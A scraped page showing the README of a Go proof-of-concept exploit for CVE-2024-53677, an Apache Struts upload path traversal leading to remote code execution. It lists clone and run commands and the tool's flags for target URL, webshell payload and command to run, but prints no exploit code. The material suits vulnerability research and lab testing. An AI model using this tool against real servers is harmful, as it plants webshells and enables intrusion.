来源

关联漏洞

描述

a proof of concept of CVE-2024-53677

介绍

#   CVE-2024-53677
A kind old vulnerability that effect `Apache Struts` leading to LFI, and remote exection.

## more info about the vulnerability you can refer to this great blog.

[Apache Struts path traversal → RCE (CVE-2024-53677)](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)

## POC usage
I have send much time make this as custamizable as possiable because when i first encounter this CVE did not find a good source that implement it correctly.
Most of the flags have a default values so do not be discourage with all of these flags.

```bash
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd  CVE-2024-53677-POC
go run . -h
```

```bash

  -command string
        command to execute on the server default: whoami
  -end-point string
        post endpoint default to: upload.action
  -file-location string
        where to save the file into the server default: what test function return
  -lfi-param string
        Parameter name for LFI testing default: top.UploadFileName
  -payload-file string
        Path to the payload file default: ./shell.jsp
  -payload-file-name string
        name of the payload it self default: shell.jsp
  -payload-param string
        Parameter name for payload injection default: Upload
  -test-file-name string
        name of the testfile it self default: testfile.txt
  -testing-file string
        File used for testing default: ./testfile.txt
  -url string
        Target base URL (format http://strutted.htb/) do not forgot the [/] at the end
```
All of these commands has defaults values. I also implement a testing function to check where the file should be put and it also a user configurable options.

### Basic usage
```bash
go run .  -url http://127.0.0.1:8080/ -end-point upload.action
```


# NOTES.
Few things to note.
1. The default payload is GIF format and the content type is gif if it need to be change this is the only option where you have to change the code.
2. The test function may produce wrong assumption so do not relay on it 100%.
3. yo may need to run the exploit more than once at least twice because i notice when it first time uploaded the payload it did not find it on the very next request
So keep that in mind.

# Contributions.
Feel free to modifie or add on the exploit ♥️.

# Resources.
[Vulnerable docker image](https://github.com/cloudwafs/s2-067-CVE-2024-53677/tree/main)
[more info about the exploit](https://www.sonicwall.com/blog/apache-struts-path-traversal-to-rce-cve-2024-53677)

文件快照

 [4.0K]  /data/pocs/6681db5bb4c7d80f9ad68b77931a78507aef557b
├── [  33]  go.mod
├── [1.0K]  LICENCE
├── [6.3K]  main.go
├── [2.5K]  README.md
├── [  54]  testfile.txt
└── [2.7K]  webshell.jsp

0 directories, 6 files

备注